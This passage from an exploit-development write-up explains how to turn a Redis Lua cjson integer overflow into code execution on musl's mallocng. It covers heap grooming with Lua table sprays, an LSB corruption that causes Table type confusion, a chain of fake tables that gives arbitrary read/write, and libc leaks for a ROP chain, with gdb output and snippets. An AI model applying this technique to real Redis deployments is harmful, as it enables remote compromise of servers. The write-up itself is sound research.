allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.
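For reference, a stripped-down version of such a utility can be written against gdb's Python API; this sketch only prints the gaps, without the adjacency and guard-page annotations of the real one:

import gdb  # runs inside gdb's embedded Python interpreter

class MapGaps(gdb.Command):
    # A minimal sketch: walk /proc/<pid>/maps and print unmapped gaps.

    def __init__(self):
        super().__init__("mapgaps", gdb.COMMAND_USER)

    def invoke(self, arg, from_tty):
        pid = gdb.selected_inferior().pid
        prev_end = None
        with open(f"/proc/{pid}/maps") as maps:
            for line in maps:
                rng = line.split()[0]
                start, end = (int(x, 16) for x in rng.split("-"))
                if prev_end is not None and start > prev_end:
                    print(f"      -- GAP: {start - prev_end:#x}")
                print(f"{start:#x} - {end:#x}")
                prev_end = end

MapGaps()  # register the command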

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to the mapping output are as follows:

  • ^-- ADJ: <num> indicates a series of adjacent
    memory regions, where <num> is the accumulated
    size
  • !!! GUARD PAGE indicates a series of pages with no
    permissions, which writing to would trigger a fault
  • [00....0] -- GAP: <num> indicates an unmapped
    page between mapped regions of memory, where <num> is
    the size of the gap
   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big as or larger than the
amount of memory that will actually be written during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside the large string map and thus be useless.
Although in the case above our destination buffer (index 12) was
allocated later in memory than 9 and 11 and so won’t overflow into them,
in practice, after heap shaping fills all the gaps, this won’t
necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

[figure: non-ideal heap layout, with the cjson destination buffer mapped below the large source-string mappings]

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), as sizes too large or too small seemed to
occasionally create unwanted gaps.
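To make the threshold concrete, here is a tiny sketch of that decision
(constants as given above; the real allocator also accounts for in-band
metadata and page rounding, so treat this as approximate):

MMAP_THRESHOLD = 0x1FFEC   # above this, mallocng uses the 'special' sizeclass 63

def gets_single_slot_group(size: int) -> bool:
    # such an allocation receives its own mmap()'ed single-slot group,
    # with fixed size and contents that no other code will touch
    return size > MMAP_THRESHOLD

print(gets_single_slot_group(0x100000))   # True: one dedicated mapping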

To actually trigger the large allocations, I create a Lua table of
floating-point numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to create
a table with an array big enough to cause the 0x101000 map (keeping in
mind the in-band metadata, which will add overhead). I do something like
this:

-- pre-allocate tables
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings: 0xD000 sequential keys grow each
-- table's array part to roughly 0x100000 bytes of TValues, which lands
-- in a 0x101000-byte single-slot mapping
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end

I used the gap mapping script to confirm this behavior while
debugging, and eventually ended up with the following, where each new
table allocation gets its own array mapping:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...

So the layout will ultimately look something like:

[figure: heap layout showing the source string slot, the cjson overflow slot, filler mappings, and the target slot]

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

One more complication is that the exact offset of the overflow may
change by a small amount if the Lua script changes, or if there are
other side effects on the heap. This seems to be due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this much, but it is likely possible to
eliminate the indeterminism entirely. I chose to work around it by
using a slightly smaller offset and repeatedly triggering the overflow
while increasing the length. The main caveat of multiple attempts is
that, due to the corruption of legitimate chunks, we have to avoid the
garbage collector firing. Also, Lua strings are immutable and interned,
so each string being allocated needs to be unique; each attempt we make
therefore consumes a few hundred MB of memory. If our offset is too far
off, we may well exhaust the memory of the target before we succeed. In
practice, this isn’t a big issue: once the exploit is stable and the
code isn’t changing, this offset won’t change.

Successful brute force applied to the previous example looks
something like this:

[figure: memory layout after successfully brute-forcing the overflow offset]

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

[figure: the corrupted TValue array, with one entry's LSB overwritten]

While targeting ptmalloc2, the Ricerca Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

[figure: the confused Table overlapping two adjacent 0x50-byte slots]

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-size group.
Suppose we know the address of a table to start from:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. We want to,
however, analyze the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap gdb plugin to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20
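For reference, these addresses are simply the group base plus the slot
index times the stride; a quick sketch that reproduces the list (base
and stride taken from the mchunkinfo output above):

group = 0x7ffff7a5f7a0   # group base from mchunkinfo
stride = 0x50            # sizeclass 4 stride

for i in range(25):      # last_idx is 24, so the group holds 25 slots
    print(f"{i:2}: {group + i * stride:#x}")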

Before going further, I want to note that, other than the
Table being targeted by the overwrite, these stride-0x50
slots can be TString values that we control. So below, if I
say target index N, it means the slot at index N is a
Table, but you can assume that the slots adjacent to it (N-1 and N-2)
are controlled TString structures.

Let’s start from the lowest LSB in the list and go until the pattern
repeats. We see that at index 2 the LSB is 0x40, and the pattern repeats
at index 18. That means we only need to analyze candidate tables between
2 and 17 to cover all cases. We want to see what will happen if we
overwrite any of these entries with 0x22: where does it fall within an
earlier slot, and how might that influence what we control? When we
trigger this confusion, the uncontrolled value 0x22 guarantees that we
overlap two different 0x50-byte slots, so we may want to control them
both.

A quick refresher in case you’ve forgotten: we are corrupting the LSB
of a TValue in some table’s Table->array buffer, and that
TValue points to one of the slots in the group we are analyzing.
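Because the group base and stride are fixed, we can compute where each
corrupted pointer lands instead of relying on trial and error; a purely
illustrative sketch using the addresses above:

group = 0x7ffff7a5f7a0
stride = 0x50

for idx in range(2, 18):                  # the LSB pattern repeats after 17
    slot = group + idx * stride
    fake = (slot & ~0xFF) | 0x22          # LSB overwritten with 0x22
    base, off = divmod(fake - group, stride)
    print(f"corrupt idx {idx:2}: fake Table at {fake:#x} starts {off:#x} "
          f"bytes into slot {base}, spilling {off:#x} bytes into slot {base + 1}")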

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 0x22, we get a confused table at
0x7ffff7a5fb22, so the confused table starts inside
the associated Table. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only the
0x12 bytes spilling into the slot at index 12, which follows the
confused Table, will actually be controlled, so this is probably not
ideal.

Okay, now we should find a better candidate: something that, if we
corrupt it, jumps back some large distance and overlaps at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B2) overlaps with both index 8 and the first two bytes
of index 9. In this scenario, index 8 could be a TString, which
we control.

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
  }
}
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32 bytes of
controlled data. I’ve already populated this data at the right offsets
to demonstrate which values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and is no longer of type LUA_TTABLE.
Fortunately, this isn’t a problem: when accessing numbered index
members inside a table’s array, Lua uses the type specified by
the TValue pointing at the object to determine its type. It
never references the type information inside the object itself. That
type information is used specifically by the garbage
collector, which we don’t plan on running. Similarly, the
next pointer is only used by the garbage collector, so it
being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key && key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return &t->array[key-1];
  else {
    ...

This function returns the TValue from the
Table->array buffer. The TValue contains its
own tt member, as mentioned earlier. This
TValue may later be used by some Lua code to access it
as a Table, which is handled by
luaV_gettable.

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

[figure: the spoofed read-only Table referencing attacker-controlled slots]

Let’s use our read-only Table to try to read a
controlled, writable Table object. The first question is:
where do we point our read-only Table->array member? The
leak primitive that Lua gives us will only leak addresses of tables, so
we’re still limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is zero, and we are still
able to control the Table->array pointer with controlled
string contents.
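As a sketch, the 16 bytes planted over the lastfree/gclist region look
like this (field offsets come from the ptype output above; the
LUA_TTABLE tag value is assumed from Lua 5.1’s lua.h):

import struct

LUA_TTABLE = 5   # assumed from Lua 5.1's lua.h

def fake_tvalue(tstring_addr: int) -> bytes:
    # a Lua 5.1 TValue is { Value value; int tt; } padded to 16 bytes;
    # point the value at offset 0x5 into a controlled TString and tag it
    # as a table, so Lua treats the string contents as a Table structure
    return struct.pack("<QQ", tstring_addr + 0x5, LUA_TTABLE)

# this is written over read_only_table + 0x30 (lastfree/gclist), and the
# read-only table's array member is then pointed at that same address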

What we end up with looks like this:

[figure: the writable confused Table built from controlled TString contents]

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions onto our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricerca Security exploit expects to be.

This ultimately looks like so:

[figure: the chain of confused tables forming the AARW primitive]

This AARW is a bit cumbersome, so the Conviso exploit sets up a
TString object on the heap and modifies its length to
allow larger swaths of memory to be read in one go.

redis-server/libc ASLR Bypass and Code Execution

The Conviso Labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
while executing Lua code inside the coroutine, it’s possible to use the
AARW primitive to leak the address of the stored setjmp buffer, which
leaks the stack address. From there, it’s possible to leak a GNU libc
address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here, such as the offset for the musl
libc leak being different. Also, unlike the Conviso exploit, we can’t
easily brute force it, because the heap addresses and musl libc
addresses are too similar; this differs from the original ptmalloc2
example, where brk() was used. This led to me using a static
offset on the stack to find the musl libc address.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled or
redis-server is not compiled as PIE, redis-server will almost certainly be
inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable in one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year  Author                    Title
2017  saelo                     Pwning Lua through ‘load’
